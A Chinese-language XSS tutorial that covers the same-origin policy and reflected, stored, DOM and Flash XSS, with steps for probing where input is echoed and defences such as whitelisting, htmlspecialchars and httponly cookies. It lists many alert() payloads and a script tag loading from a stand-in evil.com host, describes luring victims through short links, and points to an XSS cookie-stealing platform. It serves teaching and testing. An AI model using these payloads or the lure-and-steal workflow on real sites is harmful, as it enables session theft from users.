跨站脚本攻击(Cross Site Scripting)的缩写,为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

目录

跨站: 从字面来分析,因为这个“跨”实际上是浏览器的特性,而不是缺陷,造成“跨”这样的假象是因为绝大多数XSS攻击都会采用嵌入一段远程或者第三方域上的脚本资源。

<script src=http://www.evil.com/evil.js>

脚本: 跨站脚本重点已经不在“跨站”这个字母上,而是“脚本”。脚本主要是有两个:JavaScript和ActionScript。

同源策略

同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定。 同源策略是浏览器中最基本的安全功能。缺少同源策略,很多浏览器的常规功能都会受到影响,可以说Web是构建在同源策略基础之上的。

如果Web世界没有同源策略,当你登录FreeBuf账号并打开另一个站点时,这个站点上的JavaScript可以跨域读取你的FreeBuf账号数据,这样的话整个WEB世界就没有 隐私而言。

浏览器的同源策略,限制了不同源的“document”或是脚本,对当前“document”或资源及其属性的读写权限。

同源策略是一种安全思想,但并不是统一的规范体系。不同语言脚本以及插件,它们的同源策略规则也不尽相同,不可一概而论。 javaScript中的同源,需要对比 两者中的协议、域名、端口。三者完全相同才认为是同源的,否则即是来自不同源的内容。

在HTML语言中,有部分标签在引用第三方资源时,不受同源策略的限制:

<script src=http://xss.tv/jquery.js>
<img src=http://edu.xss.tv/back.jpg>
<iframe src='http://hacker.wang/c.>  
<link>
......

上述这种带src属性的标签,在加载时,实际是生成一条GET请求,向指定服务器申请资源。

XSS原理

用户提交的数据没有过滤,或者过滤不严格,输出到网页中 ,导致可以构造执行JS代码,或者修改网页内容。

XSS危害

对于那些半年没有更新的小企业网站来说,发生XSS漏洞几乎没有什么用。但是在各类的社交平台,邮件系统,开源流行的Web应用,BBS,微博等场景中,造成的杀伤力却十分强大。

获取用户或者管理员的Cookie

XSS Worm

挂马(水坑攻击)

有局限性的键盘记录等

XSS分类

反射型XSS

存储型XSS

DOM XSS

Flash XSS

反射型XSS

反射型XSS又称为非持久型XSS。XSS代码出现在URL参数或者请求中,浏览器发出请求时,参数值作为输入提交到服务器,服务器接受这个参数并处理后,参数值出现在响应的HTML中,最后浏览器解析执行了这段XSS代码。

反射型XSS利用过程(可以考虑使用短链接)

  1. 恶意的攻击者发给受害者一个链接(链接中携带xss代码)
  2. 攻击者诱使受害者点开这个链接
  3. XSS代码被提交到有XSS漏洞的Web应用程序上
  4. WEB应用程序没有过滤提交上来的数据,或者过滤不严格。
  5. WEB应用程序输出用户提交上来的数据(包含XSS代码)。
  6. 用户浏览器渲染返回的HTML页面,执行返回的JavaScript代码
  7. 恶意的javascript代码在后台悄悄执行,获取用户信息

示例:

<script>
<script>alert("xss");</script>
<img>
<img src=1 onerror=alert("xss");>
<input>
<input onfocus="alert('xss');">
竞争焦点,从而触发onblur事件
<input onblur=alert("xss") autofocus><input autofocus>
通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="alert('xss');" autofocus>
<details>
<details ontoggle="alert('xss');">
使用open属性触发ontoggle事件,无需用户去触发
<details open ontoggle="alert('xss');">
<svg>
<svg onload=‘alert("xss")’>
<select><select onfocus=alert(1)></select>
通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<select onfocus=alert(1) autofocus>

HTML属性 : https://www.runoob.com/tags/ref-eventattributes.html

XSS平台获取cookie : https://xssaq.com

短链接生成平台

https://dwz.3wt.cn/

https://suowo.cn/

https://www.aifabu.com/?channel=www&keyword=duanlianlianjie&node=%E7%9F%AD%E9%93%BE%E9%93%BE%E6%8E%A5

存储型XSS

存储型XSS,又称持久型XSS,他和反射型XSS最大的不同就是,攻击脚本将被永久地存放在目标服务器的数据库或文件中。

存储型XSS存储过程

存储型XSS利用过程

  1. 恶意的攻击者在存在XSS漏洞的网站提交一段XSS代码
  2. Web应用程序接受提交数据,没有过滤或者过滤不严格
  3. 写入到数据库中或者是文件中
  4. 受害者访问这个存在XSS恶意代码的页面时
  5. Web应用程序从数据库或者是从文件中读取之前恶意攻击者提交的代码
  6. Web应用服务器返回这段数据
  7. 受害者浏览器渲染返回的HTML页面,执行返回的JavaScript代码
  8. 恶意的javascript代码在后台悄悄执行,获取用户信息。

DOM型XSS

DOM XSS与反射型XSS和存储型XSS的差别是在于DOM XSS的代码不需要服务器解析响应的直接参与,触发XSS漏洞靠的是浏览器DOM解析器的解析,和服务器没有直接关系,可以完全认为是客户端的事情。第二个,往往查看源码无法找到我们拼凑进去的标签

‘ onclick=alert(/xss/) //

DOM介绍

对象模型(Document Object Model),即大名鼎鼎的DOM。DOM可以被认为是一种通过将页面元素以对象的树形方式表现,以便由Javascript组织处理的实现方法。

DOM函数

常用的DOM方法

用户可通过 JavaScript (以及其他编程语言)对 HTML DOM 进行访问。所有 HTML 元素被定义为对象,而编程接口则是对象方法和对象属性。

DOM型XSS执行过程

XSS触发方式

<iframe>
<iframe onload=alert("xss");></iframe>
<video>
<video><source onerror="alert(1)">
<audio>
<audio src=x  onerror=alert("xss");>
<body>
<body/onload=alert("xss");>

利用换行符以及autofocus,自动去触发onscroll事件,无需用户去触发

Flash XSS

利用的是网页上flash文件缺陷来执行js脚本,一般是反射型xss

XSS挖掘

看URL参数输出的位置

看输入框输出位置

一般我们在判断是否存在xss的时候,会首先输入类似于下面的字符串:123456<>”’ 然后右键查看源代码,看我们输入的特殊字符串是否在页面中显示,如果没显示,则可能存在dom型xss,也有可能不存在xss.如果存在,重点看我们输入的特殊的字符是否被转义,如果没被转义,基本上可以判断存在xss,剩下的只是如何构造的问题.如果被转义了,则需要首先看是所有的都被转义了,还是部分,如果是部分,则考虑当前位置能否使用未转义的符号进行拼接.

输出点位置

1、输出在(尖括号外)<div>输出点</div>需要可以构造标签,如果不能构造标签就不存在XSS漏洞。

2、输出到尖括号中如果输出在”双引号或者’单引号内部,需要能够闭合引号,如果不能闭合引号,就需要看能否在当前的标签属性中执行js代码,如果不能,就不存在XSS漏洞。

<?php
    $js_inject = htmlspecialchars($_GET['inject'],ENT_QUOTES );
    $js = "<a href='$js_inject'>dianji</a>";
    echo $js;
?>

如果可以闭合引号,可以构造一个新的属性,使用新的属性的值来执行JS代码,比如事件属性。或者闭合尖括号,构造的新的标签也可以。

3、输出到Script标签中

如果输出在”双引号或者’单引号内部,需要能够闭合引号,如果可以闭合引号,就 可以直接传递进去js代码,使用注释符号(//),注释掉后面的js代码就可以构造XSS

如果不能闭合引号,需要看当前变量能不能innerHTML或者document.write,插入 到网页中,如果可以就可以构造XSS,如果没有,就不存在XSS

<?php
    $js_inject = htmlspecialchars($_GET['inject'],  ENT_QUOTES);
    $js = "<script> document.write('<script>$js_inject<\/script>'</script>";
    echo $js;
?>

XSS防御

对XSS的防御需要根据实际情况对用户的输入进行严格的过滤。基于过滤的XSS防御方式通常可分为两种:基于黑名单的过滤和基于白名单的过滤。后者的防御效果往往更好,对于用户在白名单之外的输入,可以直接忽略。在构造白名单的过程中需要保证在不影响用户体验的同时,尽可能杜绝一切不必要的输入内容。

在cookie中加入httponly属性可以在一定程度上保护用户的cookie,减少出现XSS时损失

Apache HTTP Server 2.2.x多个版本没有正确严格限制HTTP请求头信息,HTTP请求头信息超过LimitRequestFieldSize长度时服务器返回400(Bad Request)错误,并在返回信息中将出错请求头内容爆出,攻击者可以利用该漏洞获取httponly cookies。

https://blog.csdn.net/god_7z1/article/details/25321761

https://helpcdn.aliyun.com/knowledge_detail/37530.html

Flash XSS的修复需要对相应的flash进行修改或升级替换。使用函数对输入进行实体编码和转义()echo htmlspecialchars(“<>'””,ENT_QUOTES);echo addslashes(“‘””);

Httponly配置